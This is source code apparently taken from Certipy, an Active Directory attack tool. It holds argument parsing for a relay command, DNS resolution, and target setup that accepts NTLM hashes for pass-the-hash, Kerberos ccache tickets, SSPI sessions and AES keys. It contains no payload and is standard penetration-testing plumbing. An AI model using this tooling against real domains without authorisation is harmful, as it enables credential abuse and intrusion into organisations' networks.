        help="Don't stop the relay server after the first successful relay",
    )
    group.add_argument(
        "-no-skip",
        action="store_true",
        help="Don't skip previously attacked users. Use with -forever",
    )

    group = subparser.add_argument_group("connection options")
    group.add_argument(
        "-timeout",
        action="store",
        metavar="seconds",
        help="Timeout for connections",
        default=5,
        type=int,
    )

    return NAME, entry



import os
import platform
import socket

from certipy.lib.logger import logging
from dns.resolver import Resolver
from impacket.krb5.ccache import CCache


def is_ip(hostname: str) -> bool:
    try:
        # Check if hostname is an IP
        socket.inet_aton(hostname)
        return True
    except Exception:
        pass
    return False


class DnsResolver:
    def __init__(self):
        self.resolver = Resolver()
        self.use_tcp = False

        self.mappings = {}

    @staticmethod
    def from_options(options, target) -> "DnsResolver":
        self = DnsResolver()

        # We can't put all possible nameservers in the list of nameservers, since
        # the resolver will fail if one of them fails
        nameserver = options.ns
        if nameserver is None:
            nameserver = target.dc_ip

        if nameserver is not None:
            self.resolver.nameservers = [nameserver]

        self.use_tcp = options.dns_tcp

        return self

    @staticmethod
    def create(
        target: "Target" = None, ns: str = None, dns_tcp: bool = False
    ) -> "DnsResolver":
        self = DnsResolver()

        # We can't put all possible nameservers in the list of nameservers, since
        # the resolver will fail if one of them fails
        nameserver = ns
        if nameserver is None:
            nameserver = target.dc_ip

        if nameserver is not None:
            self.resolver.nameservers = [nameserver]

        self.use_tcp = dns_tcp

        return self

    def resolve(self, hostname: str) -> str:
        # Try to resolve the hostname with DNS first, then try a local resolve
        if hostname in self.mappings:
            logging.debug(
                "Resolved %s from cache: %s" % (repr(hostname), self.mappings[hostname])
            )
            return self.mappings[hostname]

        if is_ip(hostname):
            return hostname

        ip_addr = None
        if len(self.resolver.nameservers) == 0 or self.resolver.nameservers[0] is None:
            logging.debug("Trying to resolve %s locally" % repr(hostname))
        else:
            logging.debug(
                "Trying to resolve %s at %s"
                % (repr(hostname), repr(self.resolver.nameservers[0]))
            )
        try:
            answers = self.resolver.resolve(hostname, tcp=self.use_tcp)
            if len(answers) == 0:
                raise Exception()

            ip_addr = answers[0].to_text()
        except Exception:
            pass

        if ip_addr is None:
            try:
                ip_addr = socket.gethostbyname(hostname)
            except Exception:
                ip_addr = None

        if ip_addr is None:
            logging.warning("Failed to resolve: %s" % hostname)
            return hostname

        self.mappings[hostname] = ip_addr
        return ip_addr


def get_logon_session():
    if platform.system().lower() != "windows":
        raise Exception("Cannot use SSPI on non-Windows platform")

    from certipy.lib.sspi import get_tgt
    from winacl.functions.highlevel import get_logon_info

    info = get_logon_info()

    logonserver = info["logonserver"]
    username = info["username"]
    domain = info["domain"]
    dnsdomainname = info["dnsdomainname"]

    dns_resolver = DnsResolver()
    dc_ip = dns_resolver.resolve(logonserver)
    dc_host = "%s.%s" % (logonserver, dnsdomainname)

    return username, domain, dc_ip, dc_host


def get_kerberos_principal():
    try:
        ccache = CCache.loadFile(os.getenv("KRB5CCNAME"))
    except:
        return None

    if ccache is None:
        return None
    # retrieve domain information from CCache file if needed
    domain = ccache.principal.realm["data"].decode("utf-8")
    logging.debug("Domain retrieved from CCache: %s" % domain)

    username = "/".join(map(lambda x: x["data"].decode(), ccache.principal.components))

    logging.debug("Username retrieved from CCache: %s" % username)

    return username, domain


class Target:
    def __init__(self):
        self.domain: str = None
        self.username: str = None
        self.password: str = None
        self.remote_name: str = None
        self.hashes: str = None
        self.lmhash: str = None
        self.nthash: str = None
        self.do_kerberos: bool = False
        self.use_sspi: bool = False
        self.aes: str = None
        self.dc_ip: str = None
        self.target_ip: str = None
        self.timeout: int = 5
        self.resolver: Resolver = None

    @staticmethod
    def from_options(
        options, dc_as_target: bool = False, ptt: bool = False
    ) -> "Target":
        self = Target()

        principal = options.username
        domain = ""
        if principal is not None:
            principal = principal.split("@")
            if len(principal) == 1:
                (username,) = principal
            else:
                username = "@".join(principal[:-1])
                domain = principal[-1]
                # username, domain = principal
        else:
            username = ""

        dc_ip = options.dc_ip
        dc_host = None

        if options.do_kerberos:
            principal = get_kerberos_principal()
            if principal:
                username, domain = principal

        if options.use_sspi:
            options.do_kerberos = True
            username, domain, dc_ip, dc_host = get_logon_session()

            logging.debug(
                "SSPI Context: %s@%s on %s (%s)" % (username, domain, dc_host, dc_ip)
            )

        if domain is None:
            domain = ""
        domain = domain.upper()
        username = username.upper()

        if len(username) == 0:
            logging.error("Username is not specified")

        password = options.password
        if (
            not password
            and username != ""
            and options.hashes is None
            and options.aes is None
            and options.no_pass is not True
            and options.do_kerberos is not True
        ):
            from getpass import getpass

            password = getpass("Password:")

        hashes = options.hashes
        if hashes is not None:
            hashes = hashes.split(":")
            if len(hashes) == 1:
                (nthash,) = hashes
                lmhash = nthash = nthash
            else:
                lmhash, nthash = hashes
                if len(lmhash) == 0:
                    lmhash = nthash
        else:
            lmhash = nthash = ""

        if options.aes is not None:
            options.do_kerberos = True

        remote_name = options.target
        if (
            (options.do_kerberos or options.use_sspi)
            and not remote_name
            and not ptt
            and not dc_as_target
        ):
            logging.warning(
                "Target name (-target) not specified and Kerberos or SSPI authentication is used. This might fail"
            )

        if remote_name is None:
            if options.target_ip:
                remote_name = options.target_ip
            elif dc_host:
                remote_name = dc_host
            elif dc_ip:
                remote_name = dc_ip
            elif domain:
                remote_name = domain
            else:
                raise Exception("Could not find a target in the specified options")

        self.domain = domain
        self.username = username
        self.password = password
        self.remote_name = remote_name
        self.hashes = hashes
        self.lmhash = lmhash
        self.nthash = nthash
        self.aes = options.aes
        self.do_kerberos = options.do_kerberos
        self.use_sspi = options.use_sspi
        self.dc_ip = dc_ip
        self.dc_host = dc_host
        self.timeout = options.timeout

        if dc_as_target and options.dc_ip is None and is_ip(remote_name):
            self.dc_ip = remote_name

        if options.ns is None:
            options.ns = self.dc_ip

        if is_ip(remote_name):
            options.target_ip = remote_name

        self.resolver = DnsResolver.from_options(options, self)

        self.target_ip = options.target_ip
        if self.target_ip is None and remote_name is not None:
            self.target_ip = self.resolver.resolve(remote_name)

        if self.dc_ip is None:
            self.dc_ip = self.resolver.resolve(domain)

        return self

    @staticmethod
    def create(
        domain: str = None,
        username: str = None,
        password: str = None,
        hashes: str = None,
        target_ip: str = None,
        remote_name: str = None,
        no_pass: bool = False,
        do_kerberos: bool = False,
        use_sspi: bool = False,
        aes: str = None,
        dc_ip: str = None,
        ns: str = None,
        dns_tcp: bool = False,
        timeout: int = 5,
    ) -> "Target":

        self = Target()

        if use_sspi:
            do_kerberos = True
            username, domain, dc_ip, dc_host = get_logon_session()

            logging.debug(
                "SSPI Context: %s@%s on %s (%s)" % (username, domain, dc_host, dc_ip)
            )

        if domain is None:
            domain = ""
        if username is None:
            username = ""

        domain = domain.upper()
        username = username.upper()

        if (
            not password
            and username != ""
            and hashes is None
            and aes is None
            and no_pass is not True
        ):
            from getpass import getpass

            password = getpass("Password:")

        if hashes is not None:
            hashes = hashes.split(":")
            if len(hashes) == 1:
                (nthash,) = hashes
                lmhash = nthash = nthash
            else:
                lmhash, nthash = hashes
                if len(lmhash) == 0:
                    lmhash = nthash
        else:
            lmhash = nthash = ""

        if aes is not None:
            do_kerberos = True

        self.domain = domain
        self.username = username
        self.password = password
        self.remote_name = remote_name
        self.hashes = hashes
        self.lmhash = lmhash
        self.nthash = nthash
        self.aes = aes
        self.do_kerberos = do_kerberos
        self.use_sspi = use_sspi
        self.dc_ip = dc_ip
        self.timeout = timeout

        if ns is None:
            ns = dc_ip

        if is_ip(remote_name):
            target_ip = remote_name

        self.resolver = DnsResolver.create(self, ns=ns, dns_tcp=dns_tcp)

        self.target_ip = target_ip
        if self.target_ip is None and remote_name is not None:
            self.target_ip = self.resolver.resolve(remote_name)

        return self

    def __repr__(self) -> str:
        return "<Target (%s)>" % repr(self.__dict__)



import argparse
from typing import Any


def add_argument_group(
    parser: argparse.ArgumentParser,
    connection_options: Any = None,
) -> None:
    if connection_options is not None:
        group = connection_options
    else:
        group = parser.add_argument_group("connection options")

    group.add_argument(
        "-dc-ip",
        action="store",
        metavar="ip address",
        help="IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in "
        "the target parameter",
    )
    group.add_argument(
        "-target-ip",
        action="store",
        metavar="ip address",
        help="IP Address of the target machine. If omitted it will use whatever was specified as target. "
        "This is useful when target is the NetBIOS name and you cannot resolve it",
    )
    group.add_argument(
        "-target",
        action="store",
        metavar="dns/ip address",
        help="DNS Name or IP Address of the target machine. Required for Kerberos or SSPI authentication",
    )
    group.add_argument(
        "-ns",
        action="store",
        metavar="nameserver",
        help="Nameserver for DNS resolution",
    )
    group.add_argument(
        "-dns-tcp", action="store_true", help="Use TCP instead of UDP for DNS queries"
    )
    group.add_argument(
        "-timeout",
        action="store",
        metavar="seconds",
        help="Timeout for connections",
        default=5,
        type=int,
    )

    group = parser.add_argument_group("authentication options")
    group.add_argument(
        "-u",
        "-username",
        metavar="username@domain",
        dest="username",
        action="store",
        help="Username. Format: username@domain",
    )
    group.add_argument(
        "-p",
        "-password",
        metavar="password",
        dest="password",
        action="store",
        help="Password",
    )
    group.add_argument(
        "-hashes",
        action="store",
        metavar="[LMHASH:]NTHASH",
        help="NTLM hash, format is [LMHASH:]NTHASH",
    )
    group.add_argument(
        "-k",
        action="store_true",
        dest="do_kerberos",
        help="Use Kerberos authentication. Grabs credentials from ccache file "
        "(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the "
        "ones specified in the command line",
    )
    group.add_argument(
        "-sspi",
        dest="use_sspi",
        action="store_true",
        help="Use Windows Integrated Authentication (SSPI)",
    )
    group.add_argument(
        "-aes",
        action="store",
        metavar="hex key",
        help="AES key to use for Kerberos Authentication " "(128 or 256 bits)",
    )
    group.add_argument(
        "-no-pass",
        action="store_true",
        help="Don't ask for password (useful for -k and -sspi)",
    )
